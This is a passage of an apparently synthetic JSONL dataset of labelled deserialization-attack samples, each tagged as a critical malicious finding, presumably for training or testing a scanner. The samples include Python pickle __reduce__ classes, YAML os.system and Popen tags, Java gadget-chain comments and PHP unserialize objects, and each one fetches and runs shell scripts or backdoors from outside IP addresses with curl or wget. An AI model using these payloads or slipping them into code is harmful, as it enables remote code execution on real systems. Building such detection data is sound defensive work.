"payload": "import pickle, base64\ndata = base64.b64decode('jaidbUH3KnoQ0ulwW6edu/14Piw58wfKj+cxsuYdghXviTZue55usSteX3Sq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00378", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://133.226.230.235/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://133.226.230.235/shell\")"}}]} {"id": "synth_malicious_deserialization_00379", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://101.99.114.229/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://85.155.255.148/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://101.99.114.229/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://85.155.255.148/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00380", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://240.250.202.23/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://240.250.202.23/shell\")"}}]} {"id": "synth_malicious_deserialization_00381", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://211.212.43.81/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://211.212.43.81/shell\")"}}]} {"id": "synth_malicious_deserialization_00382", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"am3hScg3hcUmRh7rUx87l6THKoR8Tu/291kxdkYk\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://85.111.15.163/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"am3hScg3hcUmRh7rUx87l6THKoR8Tu/291kxdkYk\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://85.111.15.163/bd\")"}}]} {"id": "synth_malicious_deserialization_00383", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://31.2.252.156/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://69.161.28.25/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://31.2.252.156/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://69.161.28.25/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00384", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:65:\"N9pMuf9wuhR6Vyi/3nP7eIEnqCHixazk5IEsNgQw\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://160.198.236.132/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:65:\"N9pMuf9wuhR6Vyi/3nP7eIEnqCHixazk5IEsNgQw\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://160.198.236.132/bd\")"}}]} {"id": "synth_malicious_deserialization_00385", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('pUdCf5TH9H4CCtPgezFpLnDoDOafbxG+lOKrj7eCfvtJ5FdIlbadCehLYNcR')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://26.85.61.70/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('pUdCf5TH9H4CCtPgezFpLnDoDOafbxG+lOKrj7eCfvtJ5FdIlbadCehLYNcR')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00386", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://253.29.43.123/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://253.29.43.123/shell\")"}}]} {"id": "synth_malicious_deserialization_00387", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:67:\"C/6U7EFnAgqPeMQFrUSmJa0lZBdsTdIv99qUkRpA\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://117.249.139.217/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:67:\"C/6U7EFnAgqPeMQFrUSmJa0lZBdsTdIv99qUkRpA\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://117.249.139.217/bd\")"}}]} {"id": "synth_malicious_deserialization_00388", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:23:\"fX3pjbcDqwMkHa3I439KCNIpkPcukXAQyWvQpaOO\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://112.225.236.156/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:23:\"fX3pjbcDqwMkHa3I439KCNIpkPcukXAQyWvQpaOO\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://112.225.236.156/bd\")"}}]} {"id": "synth_malicious_deserialization_00389", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:75:\"RG2jcZBGf/B02/sXpVXWr5Py97PMFK5ujkKMJIIm\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://213.45.69.254/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:75:\"RG2jcZBGf/B02/sXpVXWr5Py97PMFK5ujkKMJIIm\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://213.45.69.254/bd\")"}}]} {"id": "synth_malicious_deserialization_00390", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('XQb1TOwNrlXo0n8AUM9PIILZMfY65D5dZ3W+oJniJeEObWHGxkeC7O6VLRO/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://248.4.19.111/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('XQb1TOwNrlXo0n8AUM9PIILZMfY65D5dZ3W+oJniJeEObWHGxkeC7O6VLRO/')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00391", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:22:\"4NufGgGz4DHvt9BNsGlCZsZQ1BKROttRQCEzwmfQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://254.88.242.87/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:22:\"4NufGgGz4DHvt9BNsGlCZsZQ1BKROttRQCEzwmfQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://254.88.242.87/bd\")"}}]} {"id": "synth_malicious_deserialization_00392", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('3BLJ67Pfd90LOaVHgXgbxY6TfpODZt3bKUCQQCsVEYq43KTWGjIJRedukQdj')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://253.191.255.214/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('3BLJ67Pfd90LOaVHgXgbxY6TfpODZt3bKUCQQCsVEYq43KTWGjIJRedukQdj')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00393", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://24.3.241.171/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://224.112.57.226/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://24.3.241.171/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://224.112.57.226/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00394", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://54.112.50.234/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://54.112.50.234/shell\")"}}]} {"id": "synth_malicious_deserialization_00395", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:26:\"hPHSqnEskPYnsuePwFLafElr8nlw2imq87XNGA3F\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://185.180.200.175/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:26:\"hPHSqnEskPYnsuePwFLafElr8nlw2imq87XNGA3F\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://185.180.200.175/bd\")"}}]} {"id": "synth_malicious_deserialization_00396", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('V+lRJtgdJX+SbOvOwOoYyTxgVhyV3TFuLIN+M9xQbd9/npClncXnGRQ7eJ+0')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://7.168.253.212/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('V+lRJtgdJX+SbOvOwOoYyTxgVhyV3TFuLIN+M9xQbd9/npClncXnGRQ7eJ+0')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00397", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('kJ1HUhXhh5ahBmM8DtKrCPfAoMU8iypVeNY7P1oYCjkKdyy4npLF3Du+WVN6')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://70.107.148.82/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('kJ1HUhXhh5ahBmM8DtKrCPfAoMU8iypVeNY7P1oYCjkKdyy4npLF3Du+WVN6')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00398", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://92.25.53.205/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://92.25.53.205/shell\")"}}]} {"id": "synth_malicious_deserialization_00399", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://220.247.68.83/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://220.247.68.83/shell\")"}}]} {"id": "synth_malicious_deserialization_00400", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('HJXtqjeSHvN76Jq9YBdNOgUv2w1XdnVGZPzNLoQsqBXbhJg8iXKXwKxm1suN')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://193.59.87.100/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('HJXtqjeSHvN76Jq9YBdNOgUv2w1XdnVGZPzNLoQsqBXbhJg8iXKXwKxm1suN')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00401", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://222.99.55.3/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.213.182.3/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://222.99.55.3/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.213.182.3/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00402", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('dVJqqXS7gTcSRHZKYukka++M90iHBOUbwkAu2tBTe837pE3tsOOu+CuLn9B9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://243.46.232.182/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('dVJqqXS7gTcSRHZKYukka++M90iHBOUbwkAu2tBTe837pE3tsOOu+CuLn9B9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00403", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('5V/gHvR7TcCA4KYVj/ae7KWA7Df9tIxgBytPvxuHRqwCZex1hbqnv2BCHtsx')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://94.9.30.58/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('5V/gHvR7TcCA4KYVj/ae7KWA7Df9tIxgBytPvxuHRqwCZex1hbqnv2BCHtsx')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00404", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"V8WIBKlepya5+drhpOa4zLYjDDLIBMdbjNnEZ6WR\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://152.175.193.99/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"V8WIBKlepya5+drhpOa4zLYjDDLIBMdbjNnEZ6WR\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://152.175.193.99/bd\")"}}]} {"id": "synth_malicious_deserialization_00405", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:62:\"6P25j0CZZal5DUPMFi6eQQfUZ/bFFcQo3e442QqS\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://45.242.136.132/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:62:\"6P25j0CZZal5DUPMFi6eQQfUZ/bFFcQo3e442QqS\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://45.242.136.132/bd\")"}}]} {"id": "synth_malicious_deserialization_00406", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:73:\"b/NDeaOk3XqfQYZ/WoXN3g0vTKjg3+HSsk40iXjY\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://110.65.81.111/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:73:\"b/NDeaOk3XqfQYZ/WoXN3g0vTKjg3+HSsk40iXjY\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://110.65.81.111/bd\")"}}]} {"id": "synth_malicious_deserialization_00407", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://29.51.102.26/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://29.51.102.26/shell\")"}}]} {"id": "synth_malicious_deserialization_00408", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('SAxLOEjRu8j0ujQ+aXvbI7mtFbFwEZEydI77IAJrfXQ6+dxF8KP4Vq9xgoeg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://195.146.215.175/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('SAxLOEjRu8j0ujQ+aXvbI7mtFbFwEZEydI77IAJrfXQ6+dxF8KP4Vq9xgoeg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00409", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://188.71.7.91/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://188.71.7.91/shell\")"}}]} {"id": "synth_malicious_deserialization_00410", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://53.7.96.140/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://248.255.255.47/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://53.7.96.140/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://248.255.255.47/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00411", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('G2L48e1k1X63D8H5P47u/0EUThfOLdygk8ZjpGiVzFRl43okcDqKneTwXSwb')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://205.220.90.150/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('G2L48e1k1X63D8H5P47u/0EUThfOLdygk8ZjpGiVzFRl43okcDqKneTwXSwb')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00412", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://209.102.76.76/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://40.9.111.104/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://209.102.76.76/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://40.9.111.104/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00413", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('UzaZzJysdVS64dHivBfkCeDhgUiLS0RS49TaAuisqPSN5MAfdEOSE4XNy5Zk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://53.47.208.40/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('UzaZzJysdVS64dHivBfkCeDhgUiLS0RS49TaAuisqPSN5MAfdEOSE4XNy5Zk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00414", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('Sm9RqhhMV0758UzQMX5lzJfLKU8aAJfsMKLvDf069VsrFg4H2+nuYQADlkxh')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://188.204.162.227/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Sm9RqhhMV0758UzQMX5lzJfLKU8aAJfsMKLvDf069VsrFg4H2+nuYQADlkxh')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00415", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://29.80.170.104/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://151.166.34.251/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://29.80.170.104/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://151.166.34.251/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00416", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('Zhe0qxnBrYls3q784CuFK4OvdhDbAXbUrhJ2daOjB6iY3c3ihEsMlKTCHQHT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://91.80.127.23/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Zhe0qxnBrYls3q784CuFK4OvdhDbAXbUrhJ2daOjB6iY3c3ihEsMlKTCHQHT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00417", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://227.75.210.114/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://145.54.79.203/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://227.75.210.114/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://145.54.79.203/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00418", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://134.159.231.105/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://134.159.231.105/shell\")"}}]} {"id": "synth_malicious_deserialization_00419", "source": "synthetic", "source_license": "generated", 